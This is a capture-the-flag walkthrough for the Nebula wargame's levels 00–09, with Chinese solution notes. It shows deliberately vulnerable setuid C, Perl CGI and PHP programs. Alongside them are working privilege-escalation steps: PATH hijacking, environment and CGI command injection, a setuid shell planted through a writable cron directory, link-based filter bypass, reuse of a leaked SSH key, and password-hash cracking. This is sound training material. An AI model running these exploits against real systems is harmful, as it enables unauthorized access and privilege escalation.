level00
About
This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.
Alternatively, look at the find man page.
To access this level, log in as level00 with the password of level00.
Source code
There is no source code available for this level
Solution
查找设置了s标志的属于flag00的文件。
$ find / -perm /u+s -user level00 2> /dev/null
/bin/.../flag00
/rofs/bin/.../flag00
Level01
About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.
Source code
(level1.c)
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char** argv, char** envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}
Solution
程序使用了 env 读取本地环境变量,但是他是可控的。
make file /home/level01/echo
#!/bin/sh
sh
$ chmod u+x /home/level01/echo
$ export PATH=/home/level01:$PATH
Level02
About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.
Source code
(level2.c)
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
char *buffer;
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
buffer = NULL;
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);
system(buffer);
}
Solution
程序直接将环境变量 USER 写入到命令 ,这里存在命令注入。
$ export USER=\;sh\;
Level03
About
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Source code
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
Solution
源码循环执行 writable.d 目录中的文件,但是他是可写的,直接写入命令即可。
make file getsh.c
#include <unistd.h>
#include <stdlib.h>
int main()
{
int euid = geteuid();
setresuid(euid, euid, euid);
system("/bin/sh");
return 0;
}
$ gcc getsh.c -o /tmp/getsh
$ chmod +x /tmp/getsh
make file cmd.sh
cp /tmp/getsh ~/getsh
chmod +s ~/getsh
$ mv cmd.sh /home/flag03/writable.d/
$ sleep 180;/home/flag03/getsh
Level04
About
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.
Source code
(level4.c)
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
int main(int argc, char **argv, char **envp)
{
char buf[1024];
int fd, rc;
if(argc == 1) {
printf("%s [file to read]\n", argv[0]);
exit(EXIT_FAILURE);
}
if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);
exit(EXIT_FAILURE);
}
fd = open(argv[1], O_RDONLY);
if(fd == -1) {
err(EXIT_FAILURE, "Unable to open %s", argv[1]);
}
rc = read(fd, buf, sizeof(buf));
if(rc == -1) {
err(EXIT_FAILURE, "Unable to read fd %d", fd);
}
write(1, buf, rc);
}
solution
过滤了文件名,使用链接绕过,符号、硬链接均可。
$ ln /home/flag04/token ./too
$ /home/flag04/flag04 ~/too
Level05
About
Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Source code
There is no source code available for this level
Solution
$ ll /home/flag05
drwxr-x--- 1 flag05 level05 80 2016-07-13 01:12 ./
drwxr-xr-x 1 root root 180 2012-08-27 07:18 ../
drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup/
-rw------- 1 flag05 flag05 13 2016-07-13 01:12 .bash_history
-rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05 60 2016-07-13 01:11 .cache/
-rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05 70 2011-11-20 20:13 .ssh/
$ ll /home/flag05/.backup
drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 ./
drwxr-x--- 1 flag05 level05 80 2016-07-13 01:12 ../
-rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz
可知ssh备份文件可读,直接拷贝至用户目录,ssh登入。
$ cp /home/flag05/backup-19072011.tgz ./
$ tar zxvf backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
Get the private key, You can ssh it
$ ssh flag05@localhost
Level06
About
The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.
Source code
There is no source code available for this level
Solution
$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
/etc/passwd 密码密文可读且弱加密,使用 john 爆破
root@kali:~# john -show passwd
flag06:hello:993:993::/home/flag06:/bin/sh
1 password hash cracked, 0 left
johnis a tool to find week password in linux
Level07
About
The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.
Source code
#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
$host = $_[0];
print("<html><head><title>Ping results</title></head><body><pre>");
@output = `ping -c 3 $host 2>&1`;
foreach $line (@output) { print "$line"; }
print("</pre></body></html>");
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
Solution
$host 参数存在命令注入。
level07@nebula:~$ cat ../flag07/thttpd.conf | grep port=
port=7007
level07@nebula:~$ wget -qO- 'localhost:7007/index.cgi' --post-data=\
> `php -r "echo 'Host='.urlencode(';cp /tmp/getsh ~/;chmod +s ~/getsh');"`
Level08
About
World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.
Source code
There is no source code available for this level
Solution
$tcpflow -c -r capture.cap
tcpflow 可以看见密码 backdoor...00Rm8.ate .. 不过有错误
import scapy.all as scapy
back = scapy.rdpcap('capture.pcap')
for p in back:
p.payload.payload.payload.show()
python可以看到密码中的. 其实是 \x7f ASCII删除符号,所以可得密码为 backd00Rmate
Level09
About
There’s a C setuid wrapper for some vulnerable PHP code…
To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.
Source code
<?php
function spam($email)
{
$email = preg_replace("/\./", " dot ", $email);
$email = preg_replace("/@/", " AT ", $email);
return $email;
}
function markup($filename, $use_me)
{
$contents = file_get_contents($filename);
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
$contents = preg_replace("/\[/", "<", $contents);
$contents = preg_replace("/\]/", ">", $contents);
return $contents;
}
$output = markup($argv[1], $argv[2]);
print $output;
?>
Solution
可以看到在 preg_replace 函数中使用了不安全的被废弃的符号 e 可以使用 $use_me 参数实现命令注入
$ echo "[email {\${print(\`\$use_me\`)}}]" > /tmp/test
$ ./flag09 /tmp/test "cp /tmp/getsh /home/flag09/"
$ ./flag09 /tmp/test "chmod +s /home/flag09/getsh"